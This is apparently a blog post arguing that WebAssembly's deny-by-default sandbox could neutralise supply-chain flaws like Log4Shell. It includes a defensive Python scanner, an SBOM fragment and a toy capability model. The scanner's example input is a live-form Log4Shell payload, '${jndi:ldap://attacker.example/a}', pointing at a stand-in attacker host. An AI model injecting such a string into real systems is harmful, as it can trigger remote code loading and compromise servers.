With many applications depending on open-source software, how do we protect ourselves against the unknown vulnerabilities that undoubtedly exist? What measures can we put in place today to mitigate risk without eliminating the value of perfectly good software?
Much has already been written about how “Log4Shell”, the exploit in the “Log4j” open source library (used extremely widely in server-side Java), has rocked the software industry.
An attacker “can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled” (from CVE-2021-44228, logged on 26 November 2021 and made public on 9 December).
Apache has given it the highest severity rating of 10, and some consider it even more serious than the Heartbleed vulnerability from 2014. I guess we’ll see.
In my opinion, the biggest problem will be the extremely long tail of updates to the hundreds of millions of affected systems, many of which will never be patched or reconfigured.
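The attack surface is deceptively simple: Log4j’s message lookup substitution means that any logged string containing a `${jndi:...}` token can trigger a remote class load. As a rough illustration of the pattern (in Python, purely for clarity; the real behaviour lives inside Log4j’s Java interpolator, and this is not a complete defence), a scanner for suspicious log input might look like this:

```python
import re

# Matches the plain ${jndi:<protocol>://...} lookup syntax that triggered
# Log4Shell. Real-world obfuscations (nested lookups such as
# ${${lower:j}ndi:...}) are far harder to catch, which is why input
# filtering alone was never a complete fix.
JNDI_LOOKUP = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns)://[^}]+\}", re.IGNORECASE)

def looks_like_log4shell(user_input: str) -> bool:
    """Return True if the string contains an unobfuscated JNDI lookup token."""
    return bool(JNDI_LOOKUP.search(user_input))

print(looks_like_log4shell("User-Agent: ${jndi:ldap://attacker.example/a}"))  # True
print(looks_like_log4shell("ordinary request path /index.html"))              # False
```

The point is not that a regex fixes anything, but that the trigger is just a string in attacker-controlled input, which is exactly why so many systems were exposed at once.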
Understand where the responsibility rests
Interestingly, another CVE was introduced as part of the fix, and a third has been discovered in the past few days, simply because of the increased scrutiny.
I have to say that, by all accounts, the team has been amazing, working round the clock to fix these issues. Let’s not forget that they are donating their time and effort for free.
Ultimately, the maintainers are not the ones responsible. It’s the consumers of open source software who need to understand that they take on all the responsibility when they use software whose source is open.
However, we’ve become very complacent about including open source packages that could easily be hiding undiscovered vulnerabilities.
There’s a tension between the value open source software brings and the risk it poses. We definitely don’t want to curtail the use of open source packages — they're just too valuable.
So what do we do?
Look for new ways to be proactive when it comes to security
In large organisations, especially banks, you would likely be required to provide a Software Bill of Materials (SBOM), and have source code and build artefacts scanned repeatedly for vulnerabilities.
This is known as Software Supply Chain Security. And it’s an industry in its own right.
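To make the SBOM idea concrete, here is a minimal fragment in the CycloneDX format (one of the common SBOM standards); the component shown is illustrative, listing a vulnerable Log4j version an organisation would want to find quickly:

```json
{
  "bomFormat": "CycloneDX",
  "specVersion": "1.4",
  "version": 1,
  "components": [
    {
      "type": "library",
      "group": "org.apache.logging.log4j",
      "name": "log4j-core",
      "version": "2.14.1",
      "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1"
    }
  ]
}
```

With an inventory like this for every deployed artefact, answering “are we running an affected Log4j version anywhere?” becomes a query rather than an archaeology project.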
Today, we build our applications using open source software, and then we wrap them in the whole, even broader, cyber security industry in an effort to protect ourselves from the harmful effects of malware that may be hiding in our dependencies.
All of this seems to me to be shutting the stable door after the horse has bolted.
What if we address the root cause, instead of the symptoms?
I think we should treat all our code as essentially non-trusted. Assume it’s already compromised. Imagine that it’s literally full of evil malware.
This is how we think about the software we run from the Web in our browsers.
Deny by default and WebAssembly
What I’m suggesting is that even the code we “write ourselves” invariably has (potentially thousands of) open source dependencies and so, in reality, it’s the same thing. Untrusted.
Importantly, in the browser, we also have WebAssembly (Wasm), a conceptually simple stack-based virtual machine that doubles as a secure sandbox for running untrusted binaries.
Now, here’s the thing. WebAssembly is becoming increasingly important outside the browser (i.e. server-side) as a highly secure runtime environment for cloud native microservice applications.
This is massive!
We are at the start of a new revolution where Cloud Native services are compiled to WebAssembly and hosted in WebAssembly runtimes.
They can contain as many open source packages as they like, and we can be pretty sure any vulnerabilities they contain will be completely impotent.
Take the Log4j issue, which depends on being able to call out to an LDAP server to download the code it’s going to execute on behalf of the attacker.
This would not be possible in a WebAssembly runtime, which has a deny-by-default sandbox model and does not even contain any code in the runtime to make the outgoing call in the first place.
Even if it were allowed to.
The future of the software industry
Code running in a Wasm runtime must be given very granular permissions in order to communicate with the world around it.
Permissions to read a specific directory on the filesystem, or to make a request to a specific API or website, for example.
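The capability model can be sketched conceptually (in Python, as an analogy only; in a real WASI runtime the mechanism is pre-opened directory handles and explicit host imports, and all names here are illustrative):

```python
class Sandbox:
    """Toy deny-by-default capability model, loosely analogous to how a
    WASI runtime pre-opens directories: anything not explicitly granted
    at startup simply does not exist for the guest code."""

    def __init__(self, readable_dirs=(), allowed_hosts=()):
        self._dirs = set(readable_dirs)
        self._hosts = set(allowed_hosts)

    def read_file(self, path: str) -> str:
        # Only paths under an explicitly granted directory are readable.
        if not any(path.startswith(d + "/") for d in self._dirs):
            raise PermissionError(f"no capability for {path}")
        return f"<contents of {path}>"  # stand-in for a real read

    def http_get(self, host: str) -> str:
        # Outbound calls are denied unless the host was granted up front.
        if host not in self._hosts:
            raise PermissionError(f"outbound call to {host} denied")
        return f"<response from {host}>"

# Grant only what the service actually needs; everything else is denied.
sb = Sandbox(readable_dirs={"/data"}, allowed_hosts={"api.example.com"})
print(sb.read_file("/data/config.toml"))   # permitted: capability was granted
try:
    sb.http_get("attacker-ldap.example")   # an exploit's callout simply fails
except PermissionError as e:
    print(e)
```

Under this model, a Log4Shell-style payload buried in a dependency has nowhere to go: the outbound LDAP call it needs is not a capability the service was ever given.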
I think WebAssembly will be everywhere in our industry’s future. And it’s important simply because it allows us to treat all our code as untrusted.
Even the code we write ourselves.
One great example of an up-and-coming server-side runtime for modern cloud native applications is wasmCloud; go check it out!